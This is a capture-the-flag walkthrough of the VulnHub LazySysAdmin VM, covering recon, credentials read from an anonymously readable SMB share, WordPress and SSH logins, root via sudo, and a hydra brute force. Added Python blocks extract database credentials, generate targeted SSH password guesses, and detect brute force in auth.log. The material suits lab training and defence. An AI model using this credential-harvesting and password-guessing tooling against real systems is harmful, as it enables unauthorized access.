CTF Walkthrough: LazySysAdmin

This time it’s the LazySysAdmin CTF challenge from VulnHub.

As per usual, download, spin up in VirtualBox, find the IP, and start poking!

root@kali:~/CTF/LazySysAdmin# nmap -sV -T4 10.13.37.244

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-07 15:59 EST
Nmap scan report for 10.13.37.244
Host is up (0.00018s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:83:A1:5A (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Hmmm, MySQL, Samba, SSH, Apache. Looks like we’ll be poking around for a little while.

root@kali:~/CTF/LazySysAdmin# nikto -host 10.13.37.244
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.13.37.244
+ Target Hostname:    10.13.37.244
+ Target Port:        80
+ Start Time:         2017-11-07 16:10:09 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /old/: Directory indexing found.
+ Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /test/: Directory indexing found.
+ Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /Backnode_files/: Directory indexing found.
+ Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /apache/: Directory indexing found.
+ OSVDB-3092: /apache/: This might be interesting...
+ OSVDB-3092: /old/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: /test/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ Uncommon header 'link' found, with contents: <http://10.13.37.244/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
+ /wordpress/: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2017-11-07 16:10:32 (GMT-5) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Let’s take a look at what this Lazy Sys Admin doesn’t want us to see…

User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

Checked them out, nothing interesting, moving on. I see WordPress and phpMyAdmin. Gonna need to find some login info for these, methinks.

root@kali:~/CTF/LazySysAdmin# enum4linux 10.13.37.244
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  7 16:15:59 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.13.37.244
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.13.37.244    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.13.37.244    |
 ============================================ 
Looking up status of 10.13.37.244
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.13.37.244    |
 ===================================== 
[+] Server 10.13.37.244 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.13.37.244    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.13.37.244    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.13.37.244 from smbclient: 
[+] Got OS info for 10.13.37.244 from srvinfo:
	LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================= 
|    Users on 10.13.37.244    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.13.37.244    |
 ========================================= 
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	BCBSNC               LR6903242
	WORKGROUP            LAZYSYSADMIN

[+] Attempting to map shares on 10.13.37.244
//10.13.37.244/print$	Mapping: DENIED, Listing: N/A
//10.13.37.244/share$	Mapping: OK, Listing: OK
//10.13.37.244/IPC$	[E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.13.37.244    |
 ==================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in <module>
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.13.37.244    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.13.37.244 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
.
.
.
<trimmed because the rest is useless>

Okay, now we’re getting somewhere! I see a couple of shares and a user “togie” on the system. I’m gonna see what this share gives me.

(You could mount this using cifs and the mount command, which I would usually do, but I’m lazy and just used the file browser in Kali and connected to smb://10.13.37.244)

Double-clicked the “share$” share and logged in anonymously, success! Okay, let’s dig into the wordpress directory and see if we can pull out the database admin account information.

Opening wp-config.php gives us the information we were looking for.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
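Pulling those defines out by eye works for one file; when a share exposes a whole web root it is worth scripting. The block below is an added example of mine, not code from the walkthrough: it parses the three defines shown above (plus a constructed DB_HOST line and a commented-out define, added to exercise the parser; neither is from the VM) and builds the mysql client command to try the harvested credentials against the 3306/tcp that nmap reported. The sample text and the localhost value are assumptions for the example.

```python
import re
import shlex

# Constructed sample: the three defines the page shows from wp-config.php,
# plus a double-quoted DB_HOST with a trailing comment and a commented-out
# define, added here to exercise the parser. Not the real file from the VM.
SAMPLE_WP_CONFIG = r"""<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname (assumed value, not from the page) */
define("DB_HOST", "localhost"); // trailing comment must not break parsing
# define('DB_PASSWORD', 'stale_password'); // commented out: must be ignored
"""

# define( 'KEY' , 'value' ) ;  with either quote style; the value may contain
# backslash-escaped characters and any quote character other than its own.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<key>[A-Z0-9_]+)\1\s*,"""
    r"""\s*(['"])(?P<val>(?:\\.|(?!\3).)*)\3\s*\)\s*;"""
)

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")


def unescape_php(val):
    """Undo the backslash escapes PHP allows inside a quoted literal."""
    return re.sub(r"\\(['\"\\])", r"\1", val)


def extract_db_credentials(php_source):
    """Return {DB_NAME, DB_USER, DB_PASSWORD, DB_HOST} from wp-config.php text.

    Works line by line: a define() on a commented-out line is skipped, and a
    comment after the define() on the same line is harmless. A define() split
    across several lines would be missed; WordPress never writes one that
    way, so that is an accepted limitation of this example.
    """
    creds = {}
    for line in php_source.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(("//", "#", "/*", "*")):
            continue
        m = DEFINE_RE.search(line)
        if m and m["key"] in DB_KEYS and m["key"] not in creds:
            creds[m["key"]] = unescape_php(m["val"])
    return creds


def mysql_cli_command(creds, host=None):
    """Build the mysql client command line to try the harvested credentials.

    host overrides DB_HOST: wp-config.php usually says localhost, but the
    scan showed 3306/tcp open on the VM, so the remote IP is what to try.
    The password goes on the command line for brevity; on a shared box that
    shows up in `ps`, so prefer an option file for anything but a lab.
    """
    argv = [
        "mysql",
        "-h", host or creds.get("DB_HOST", "localhost"),
        "-u", creds["DB_USER"],
        "-p" + creds["DB_PASSWORD"],
        creds["DB_NAME"],
    ]
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    found = extract_db_credentials(SAMPLE_WP_CONFIG)
    print(found)
    print(mysql_cli_command(found, host="10.13.37.244"))
```

Run it and the last line printed is the command to paste into a shell against the VM; the `^^` in the password is why the argument comes out single-quoted.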

Eeeexcellent. Let’s take a look at phpMyAdmin now to see what it tells us.

Damn… click on any table in the wordpress database and you get this error message. Looks like a problem with the permissions for the phpMyAdmin tables themselves. I’m thinking we’re going to get nowhere here.

Okay, this guy (girl? Probably not; as lazy as this sys admin is, it’s probably a dude…), anyway, lazy sys admin, maybe the same password (or a slight variation) for SSH? (We know there’s a “togie” user account.)

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Permission denied, please try again.

Nope, tried TogieMYSQL12345^^ and TogieSSH12345^^ to be sure. Neither worked. Okay, let’s look elsewhere. Let’s try WordPress.
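Two hand-typed variations is where most people stop; the same idea, done systematically, is a targeted wordlist built from everything harvested so far. The block below is an added example of mine, not the author's code: it takes the username, the DB password from wp-config.php and any other seeds known at this point, and emits guesses in cheapest-first order: the secret verbatim, service-name swaps (MYSQL to SSH, exactly the guess above), then each building block of the secret on its own, then word+digits combinations. The building-block step is the one that catches an admin who reuses only part of a password. The service-word set, the trailing-symbol set and the use of the SSH banner hostname Web_TR1 as a seed are assumptions for the example.

```python
import re

# Words an admin is likely to swap between services when reusing a password.
# This set is an assumption for the example; extend it per target.
SERVICE_WORDS = ("mysql", "ssh", "wordpress", "wp", "admin", "root")
TRAILING_SYMBOLS = "!@#$%^&*()_-+=.,;:?"


def case_variants(word):
    """word as found, lower, UPPER, Capitalised, without duplicates."""
    out = []
    for v in (word, word.lower(), word.upper(), word.capitalize()):
        if v not in out:
            out.append(v)
    return out


def tokenize(secret):
    """Split a secret into its building blocks.

    'TogieMYSQL12345^^' -> ['Togie', 'MYSQL', '12345', '^^']: a capitalised
    word, an all-caps word, a digit run, a symbol run.
    """
    return re.findall(r"[A-Z]+(?![a-z])|[A-Z]?[a-z]+|\d+|[^A-Za-z0-9]+", secret)


def service_swaps(secret):
    """Replace a service word inside the secret with each other service word,
    keeping the casing style of the original (MYSQL -> SSH, Mysql -> Ssh)."""
    out = []
    low = secret.lower()
    for svc in SERVICE_WORDS:
        start = low.find(svc)
        if start < 0:
            continue
        orig = secret[start:start + len(svc)]
        for repl in SERVICE_WORDS:
            if repl == svc:
                continue
            if orig.isupper():
                repl = repl.upper()
            elif orig[0].isupper():
                repl = repl.capitalize()
            out.append(secret[:start] + repl + secret[start + len(svc):])
    return out


def targeted_candidates(username, harvested, extra_seeds=()):
    """Ordered, de-duplicated password guesses for one user.

    Cheapest guesses first: the harvested secrets verbatim, then service
    swaps, then the individual building blocks of each secret, then
    word+digits combinations.
    """
    cands = []

    def add(*words):
        for w in words:
            if w and w not in cands:
                cands.append(w)

    for secret in harvested:
        add(secret, secret.rstrip(TRAILING_SYMBOLS))
        for swapped in service_swaps(secret):
            add(swapped, swapped.rstrip(TRAILING_SYMBOLS))

    words, digits = [], []
    for secret in harvested:
        for tok in tokenize(secret):
            if tok.isdigit():
                digits.append(tok)
            elif tok.isalpha():
                words.extend(case_variants(tok))
    for seed in (username, *extra_seeds):
        words.extend(case_variants(seed))
    add(*words, *digits)

    for w in words:
        for d in digits:
            add(w + d, w + d + "!")
    return cands


if __name__ == "__main__":
    # Seeds known at this point: the SSH username, the DB password from
    # wp-config.php, the WordPress DB user and the SSH banner hostname.
    # Web_TR1 as a seed is my guess, not something the walkthrough tried.
    guesses = targeted_candidates(
        "togie", ["TogieMYSQL12345^^"], extra_seeds=("Admin", "Web_TR1"))
    print(len(guesses), "candidates")
    print("\n".join(guesses))
```

Write the output to a file and feed it to the same hydra invocation used at the end of the walkthrough (`-l togie -P targeted.txt ssh://10.13.37.244`), with `-t 4` as hydra itself recommends for SSH; a list this short finishes in a few seconds and anything found here is more likely to be reused elsewhere than a rockyou hit would be.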

http://10.13.37.244/wordpress/wp-admin

Username: Admin
Password: TogieMYSQL12345^^

That got us in! Poking around, the only interesting thing I see is when editing the Admin user.

Last name, email, and he likes “yogibear”. So let’s try that.

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Permission denied, please try again.

Nope. Okay. Let’s poke around the file share some more.

Prevent users from being able to view to web root using the local file browser

Heh, yeah, yathink?

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Oh God, please don’t tell me…

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Nov  8 10:18:12 AEST 2017

  System load:  0.0               Processes:           205
  Usage of /:   47.5% of 2.89GB   Users logged in:     1
  Memory usage: 40%               IP address for eth0: 10.13.37.244
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

New release '16.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

togie@LazySysAdmin:~$ 

Damnit… I want my time back…

Okay, hold it together, we still don’t have root. Maybe there’s more to this.

togie@LazySysAdmin:~$ sudo su -
[sudo] password for togie: 
root@LazySysAdmin:~# ls -l
total 4
-rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt
root@LazySysAdmin:~# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~# 

SONNOVA!!! I was overthinking it. Breathe. Learn things.

Just to beat myself up further, let’s run a brute force on SSH, just to see how long that would’ve taken.

root@kali:~/CTF/LazySysAdmin# hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://10.13.37.244:22
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-07 19:28:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.13.37.244:22/
[22][ssh] host: 10.13.37.244   login: togie   password: 12345

Yeah, that took like 5 seconds. Maybe I shouldn’t quit my day job just yet…
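The login banner promises that all connections are monitored and recorded; a hydra run with 16 parallel tasks is exactly what that monitoring should light up, and the five-second win above is the blue-team lesson of this box as much as the red-team one. The block below is an added example of mine, not part of the walkthrough: a small sshd brute-force detector run over constructed auth.log lines. The attacker address, PIDs and ports in the sample are made up; the line format is what Ubuntu's sshd writes. It raises a low-priority alert when one source piles up failures inside a window and a high-priority one when a source with recent failures then logs in, which is the event that actually means a guess landed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/auth.log on the target. The attacker address,
# PIDs and ports are made up; the shape of each line is what Ubuntu's sshd
# writes. Six rapid failures and then a success from one source (what a hydra
# run that lands a guess looks like), plus one unrelated typo from another host.
SAMPLE_AUTH_LOG = """\
Nov  7 19:28:25 LazySysAdmin sshd[2301]: Failed password for togie from 10.13.37.10 port 51200 ssh2
Nov  7 19:28:25 LazySysAdmin sshd[2302]: Failed password for togie from 10.13.37.10 port 51201 ssh2
Nov  7 19:28:25 LazySysAdmin sshd[2303]: Failed password for invalid user admin from 10.13.37.10 port 51202 ssh2
Nov  7 19:28:26 LazySysAdmin sshd[2304]: Failed password for togie from 10.13.37.10 port 51203 ssh2
Nov  7 19:28:26 LazySysAdmin sshd[2305]: Failed password for togie from 10.13.37.10 port 51204 ssh2
Nov  7 19:28:26 LazySysAdmin sshd[2301]: Connection closed by 10.13.37.10 port 51200 [preauth]
Nov  7 19:28:27 LazySysAdmin sshd[2306]: Failed password for togie from 10.13.37.10 port 51205 ssh2
Nov  7 19:28:28 LazySysAdmin sshd[2310]: Failed password for togie from 10.13.37.50 port 40022 ssh2
Nov  7 19:28:30 LazySysAdmin sshd[2312]: Accepted password for togie from 10.13.37.10 port 51210 ssh2
Nov  7 19:28:30 LazySysAdmin sshd[2312]: pam_unix(sshd:session): session opened for user togie by (uid=0)
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_auth_line(line):
    """One sshd password-auth event, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is
    # fine for differences within one run (a year rollover mid-window is an
    # accepted limitation of this example).
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted",
            "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Sliding-window brute-force detection per source address.

    Emits a 'burst' alert once a source reaches `threshold` failures inside
    `window_s` seconds, and a 'success_after_failures' alert when a source
    that still has failures in its window logs in. The second kind is the
    one worth paging on: it means a guess landed.
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    burst_alerted = set()
    alerts = []
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        q = failures[ev["src"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if not ev["ok"]:
            q.append(ev["ts"])
            if len(q) >= threshold and ev["src"] not in burst_alerted:
                burst_alerted.add(ev["src"])
                alerts.append({"kind": "burst", "src": ev["src"],
                               "user": ev["user"], "failures": len(q)})
        elif q:
            alerts.append({"kind": "success_after_failures", "src": ev["src"],
                           "user": ev["user"], "failures": len(q)})
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(a)
```

On the sample it fires once on the fifth failure from the attacking address and once more when that address logs in as togie; the single failure from the other host never reaches the threshold. Hydra's own warning in the output above (it recommends `-t 4`) exists because SSH servers cap parallel sessions, and that same parallelism is what makes the burst trivial to spot in the log.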